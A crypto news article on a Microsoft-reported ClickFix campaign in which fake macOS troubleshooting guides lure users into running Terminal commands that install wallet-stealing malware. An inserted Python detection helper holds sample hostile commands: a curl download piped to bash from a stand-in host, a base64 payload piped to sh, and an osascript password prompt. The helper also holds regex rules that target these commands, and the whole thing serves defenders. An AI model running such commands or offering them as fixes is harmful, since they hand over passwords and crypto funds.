Microsoft: Deployed ClickFix on a fake macOS troubleshooting page to steal crypto wallet keys

MarketWhisper

ClickFix steals crypto wallet keys

According to Cryptopolitan on May 11, the Microsoft Defender security research team released its investigation results, finding that attackers have published fake macOS troubleshooting guides on platforms such as Medium and Craft since the end of 2025, tricking users into executing malicious commands in the terminal, thereby installing malware to steal crypto wallet keys, iCloud data, and browser-stored passwords.

Attack Mechanism: ClickFix Bypasses macOS Gatekeeper

According to a report by the Microsoft Defender security research team, attackers use a social engineering technique called ClickFix: they post macOS troubleshooting guides disguised as “freeing up disk space” or “fixing system errors” on platforms such as Medium, Craft, and Squarespace, prompting users to copy malicious commands and paste them into macOS Terminal; once the commands are executed, the malware is automatically downloaded and launched.

According to Microsoft’s report, this method bypasses the macOS Gatekeeper security mechanism: Gatekeeper enforces code signature and notarization checks on applications launched via Finder, but commands a user runs directly in Terminal are not subject to that verification step. Researchers also found that attackers use curl, osascript, and other native macOS tools to execute malicious code directly in memory (a fileless technique), which makes detection by standard antivirus tools difficult.

Malware Families, Theft Scope, and Special Mechanisms

According to Microsoft’s report, this campaign involves three malware families (AMOS, Macsync, SHub Stealer) and three types of installers (Loader, Script, Helper). The targeted data to be stolen includes:

Crypto wallet keys: Exodus, Ledger, Trezor

Account credentials: iCloud, Telegram

Browser-stored passwords: Chrome, Firefox

Private documents and photos: local files less than 2 MB

After the malware is installed, it displays a fake dialog box asking users to enter the system password to install a “helper tool”; if the user enters the password, the attacker can obtain full access to files and system settings. Microsoft’s report also notes that in some cases, attackers delete the legitimate Trezor Suite, Ledger Wallet, and Exodus applications and replace them with trojaned versions to monitor transactions and steal funds. In addition, the malicious software loader includes a kill switch: if an Arabic keyboard layout is detected, the malware will automatically stop execution.
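The report describes two behaviours a defender can hunt for in process telemetry: native tools (curl, osascript) fetching and running code from Terminal, and a scripted dialog asking for the system password. The triage helper below, an added example and not code from Microsoft or the campaign, runs such rules over constructed process-execution events; the event tuples, rule names, and severities are assumptions for illustration.

```python
import re

# Constructed sample process-execution events (parent app, command line);
# these are made up for this example and are not real telemetry.
SAMPLE_EVENTS = [
    ("Terminal", "ls -la ~/Library/Caches"),
    ("Terminal", "curl -fsSL https://example.invalid/fix.sh | bash"),
    ("Terminal", "echo 'Y29uc3RydWN0ZWQ=' | base64 -D | sh"),
    ("Terminal", "osascript -e 'display dialog \"Enter your password to install the helper tool\"'"),
    ("Finder", "/Applications/Exodus.app/Contents/MacOS/Exodus"),
    ("Terminal", "brew update && brew upgrade"),
]

# Rule name -> (pattern, severity). Patterns target the behaviours the report
# names: remote or decoded code piped straight into a shell (nothing is ever
# written to disk for Gatekeeper to quarantine) and osascript-driven prompts.
RULES = {
    "remote_script_piped_to_shell": (re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b"), "high"),
    "decoded_payload_piped_to_shell": (re.compile(r"\bbase64\b\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"), "high"),
    "osascript_password_dialog": (re.compile(r"\bosascript\b.*display dialog.*password", re.I), "high"),
    "osascript_inline": (re.compile(r"\bosascript\s+-e\b"), "medium"),
}

SEVERITY_ORDER = {"high": 0, "medium": 1}


def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, (rx, _) in RULES.items() if rx.search(cmdline)]


def triage(events):
    """Return one alert dict per suspicious event, highest severity first.

    Only Terminal-spawned events are in scope here: an app launched through
    Finder has already been through Gatekeeper's signature/notarization check,
    which is exactly the step the Terminal path skips."""
    alerts = []
    for parent, cmdline in events:
        if parent != "Terminal":
            continue
        hits = classify(cmdline)
        if hits:
            severity = min((RULES[h][1] for h in hits), key=SEVERITY_ORDER.get)
            alerts.append({"cmdline": cmdline, "rules": hits, "severity": severity})
    return sorted(alerts, key=lambda a: SEVERITY_ORDER[a["severity"]])


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["rules"], alert["cmdline"])
```

On a real fleet the same rules would run over EDR or unified-log process events rather than the inline list, and the Finder exclusion should be narrowed to whatever parent processes the environment actually trusts.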

Related Attack Activity and Apple Protection Measures

According to a report by ANY.RUN security researchers, the Lazarus Group has launched a hacking operation called “Mach-O Man,” using the same techniques as ClickFix, targeting financial technology and cryptocurrency companies with macOS as the primary operating system through fake meeting invitation lures.

Cryptopolitan also reported that the North Korean hacker group Famous Chollima uses AI-generated code to implant malicious npm packages into cryptocurrency trading projects. The malware uses a two-layer obfuscation architecture to steal wallet data and sensitive system information.

According to the report, Apple has added protective measures in macOS 26.4 to prevent commands marked as potentially malicious from being pasted into the macOS Terminal.

FAQ

When did the ClickFix macOS attack activity disclosed by Microsoft Defender begin, and on which platforms was it published?

Based on reporting from the Microsoft Defender security research team and Cryptopolitan on May 11, 2026, the attack activity has been active since the end of 2025. Attackers published fake macOS troubleshooting guides on platforms such as Medium, Craft, and Squarespace, prompting Mac users to execute malicious Terminal commands.

Which crypto wallets and types of data does this attack activity target?

According to the Microsoft Defender report, the malware involved (AMOS, Macsync, SHub Stealer) can steal crypto wallet keys from Exodus, Ledger, and Trezor, as well as account data from iCloud and Telegram, and usernames and passwords stored in Chrome and Firefox.

What protective measures has Apple introduced against this type of attack?

According to the report, Apple has added protection mechanisms in macOS 26.4 to block potentially malicious commands from being pasted into macOS Terminal, reducing the success rate of ClickFix-type social engineering attacks.
